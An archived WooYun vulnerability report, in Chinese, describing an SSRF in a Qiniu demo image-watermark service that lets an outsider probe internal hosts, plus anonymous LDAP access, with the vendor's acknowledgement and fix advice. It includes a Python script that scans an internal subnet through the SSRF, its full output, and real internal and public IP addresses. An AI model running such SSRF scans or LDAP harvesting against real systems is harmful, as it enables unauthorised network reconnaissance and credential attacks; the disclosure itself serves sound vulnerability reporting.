七牛某站SSRF可探测内网 | wooyun-2016-0210934| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0210934

漏洞标题：七牛某站SSRF可探测内网

漏洞作者：路人甲

提交时间：2016-05-20 17:59

修复时间：2016-07-06 14:20

公开时间：2016-07-06 14:20

漏洞类型：设计缺陷/逻辑错误

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-20：细节已通知厂商并且等待厂商处理中
2016-05-22：厂商已经确认，细节仅向厂商公开
2016-06-01：细节向核心白帽子及相关领域专家公开
2016-06-11：细节向普通白帽子公开
2016-06-21：细节向实习白帽子公开
2016-07-06：细节向公众公开

简要描述：

七牛某站SSRF可探测内网+Ldap匿名访问

详细说明：

一、SSRF漏洞
有漏洞的貌似是一个测试站。

http://demos.qiniu.com/demo/qimage/index.html

存在SSRF漏洞接口的作用是先获取远程的图片，然后把图片制作成水印覆盖在当前图片上，用百度的logo做演示，效果如下：

http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cHM6Ly93d3cuYmFpZHUuY29tL2ltZy9iZF9sb2dvMS5wbmc=/dissolve/100/gravity/SouthEast

image后边的那串base64编码是你要探测的IP和端口，如何知道内网的IP呢。这里探测到七牛的一个IP存在elasticsearch未授权访问。

可知内网中至少存在这样一个网段：

172.30.251.168:9200

将http://172.30.251.168:9200编码为base64放在image后。

http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cDovLzE3Mi4zMC4yNTEuMTY4OjkyMDA=/dissolve/100/gravity/SouthEast

如果当前IP存活且端口开放的话，会返回501错误。如探测 http://172.30.251.168:9200

如果当前IP不存活或者端口不开放的话，会返回502错误。如探测 http://172.30.251.168:1356

经过测试总结出以下规律。

返回403——IP存活且端口开放，但是该目录禁止访问
返回404——IP存活且端口开放，但是不存在该图片
返回501——IP存活且端口开放
返回502——IP不存活或者端口不开放

这里为了方便测试，写了一个探测172.30.251网段80端口是否开放的脚本，返回501错误的就是IP存活且端口开放。当然如果再深入些，可以通过探测程序的默认logo或者favicon.ico来判断目标是什么应用。

#coding=utf-8
'''
poc: qiniu_ssrf
url: http://demos.qiniu.com/demo/qimage/index.html
'''
import requests
import base64
from IPy import IP
mask = IP('172.30.251.0/24')
for ip in mask:
    print ip
    b64Domain = base64.b64encode('http://' + str(ip))
    #print b64Domain
    req = requests.get("http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/%s/dissolve/100/gravity/SouthEast" % b64Domain)
    print req.text + "\n"
    qnfile = file('/tmp/qnscan.txt', 'a')
    qnfile.write(str(ip) + '\n' + str(req.text) + '\n\n')
    qnfile.close()

这是返回的结果

172.30.251.0
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.1
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.2
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.3
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.4
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.5
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.6
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.7
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.8
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.9
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.10
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.11
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.12
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.13
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.14
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.15
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.16
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.17
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.18
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.19
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.20
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.21
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.22
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.23
{"error":"fetch image url failed and statusCode: 403"}
172.30.251.24
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.25
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.26
{"error":"fetch image url failed and statusCode: 403"}
172.30.251.27
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.28
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.29
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.30
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.31
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.32
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.33
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.34
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.35
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.36
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.37
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.38
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.39
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.40
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.41
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.42
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.43
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.44
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.45
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.46
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.47
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.48
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.49
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.50
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.51
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.52
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.53
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.54
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.55
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.56
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.57
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.58
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.59
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.60
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.61
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.62
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.63
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.64
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.65
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.66
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.67
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.68
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.69
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.70
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.71
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.72
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.73
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.74
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.75
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.76
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.77
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.78
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.79
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.80
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.81
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.82
{"error":"fetch image url failed and statusCode: 503"}
172.30.251.83
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.84
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.85
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.86
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.87
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.88
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.89
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.90
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.91
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.92
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.93
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.94
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.95
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.96
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.97
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.98
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.99
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.100
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.101
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.102
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.103
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.104
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.105
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.106
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.107
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.108
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.109
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.110
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.111
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.112
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.113
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.114
{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-23441q7XWC6pITgES': No such file or directory @ error/constitute.c/ReadImage/540"}
172.30.251.115
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.116
{"error":"fetch image url failed and statusCode: 404"}
172.30.251.117
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.118
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.119
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.120
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.121
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.122
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.123
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.124
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.125
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.126
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.127
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.128
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.129
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.130
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.131
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.132
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.133
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.134
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.135
{"error":"fetch image url failed and statusCode: 404"}
172.30.251.136
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.137
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.138
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.139
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.140
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.141
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.142
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.143
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.144
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.145
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.146
{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-5107kShQhExKivuz': No such file or directory @ error/constitute.c/ReadImage/540"}
172.30.251.147
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.148
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.149
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.150
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.151
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.152
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.153
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.154
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.155
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.156
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.157
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.158
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.159
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.160
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.161
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.162
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.163
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.164
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.165
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.166
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.167
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.168
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.169
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.170
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.171
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.172
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.173
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.174
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.175
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.176
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.177
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.178
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.179
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.180
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.181
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.182
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.183
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.184
{"error":"unsupported format:unsupported format:ERROR_CODER: Entity 'nbsp' not defined\n `No such file or directory` @ error/svg.c/SVGError/2639"}
172.30.251.185
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.186
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.187
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.188
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.189
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.190
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.191
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.192
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.193
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.194
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.195
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.196
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.197
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.198
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.199
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.200
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.201
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.202
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.203
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.204
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.205
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.206
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.207
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.208
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.209
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.210
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.211
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.212
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.213
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.214
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.215
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.216
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.217
{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-24069p9eQJObZhm7U': No such file or directory @ error/constitute.c/ReadImage/540"}
172.30.251.218
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.219
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.220
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.221
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.222
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.223
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.224
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.225
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.226
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.227
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.228
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.229
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.230
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.231
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.232
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.233
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.234
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.235
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.236
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.237
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.238
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.239
{"error":"fetch image url failed and statusCode: 404"}
172.30.251.240
{"error":"fetch image url failed and statusCode: 403"}
172.30.251.241
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.242
{"error":"fetch image url failed and statusCode: 403"}
172.30.251.243
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.244
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.245
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.246
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.247
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.248
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.249
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.250
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.251
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.252
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.253
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.254
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.255
{"error":"fetch image url failed and statusCode: 502"}

二、LDAP匿名访问

IP：115.231.182.75
端口：389

可获取企业的所有人员信息，利用这些信息可以用来爆破邮箱或者使用ldap登录的应用。

在测试时，你们搭的一个洋葱的应用（115.231.182.75:8090)因为有漏洞，不小心测挂掉了，实在是抱歉。

漏洞证明：

见详细说明

修复方案：

1. SSRF漏洞，可以统一下返回错误信息，避免用户可以根据错误信息来判断远端服务器的端口状态，且限制服务器访问的IP不能是内网IP。
2. Ldap漏洞，建议关掉Ldap的匿名访问功能。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2016-05-22 14:18

厂商回复：

感谢您对七牛的关心。
1. 是我们的演示网站。由于地址判断问题，因此存在漏洞。需要限制访问的地址范围。
2. 运行在我们的云计算系统上，对内层网络没有访问权限。
3. 115.231.182.75同为测试性ldap，运行在云计算系统上。其中灌入的是非真实数据，因此没有严重数据泄密问题。但是为了使用方便，其中不少用户名是真实的。因此需要关闭这个系统的匿名访问。
另：终于知道洋葱的系统为什么莫名其妙挂掉了。
再次感谢。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0210934

漏洞标题：七牛某站SSRF可探测内网

相关厂商：七牛云存储

漏洞作者：路人甲

提交时间：2016-05-20 17:59

修复时间：2016-07-06 14:20

公开时间：2016-07-06 14:20

漏洞类型：设计缺陷/逻辑错误

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0210934

漏洞标题：七牛某站SSRF可探测内网

相关厂商：七牛云存储

漏洞作者： 路人甲

提交时间：2016-05-20 17:59

修复时间：2016-07-06 14:20

公开时间：2016-07-06 14:20

漏洞类型：设计缺陷/逻辑错误

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0210934"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云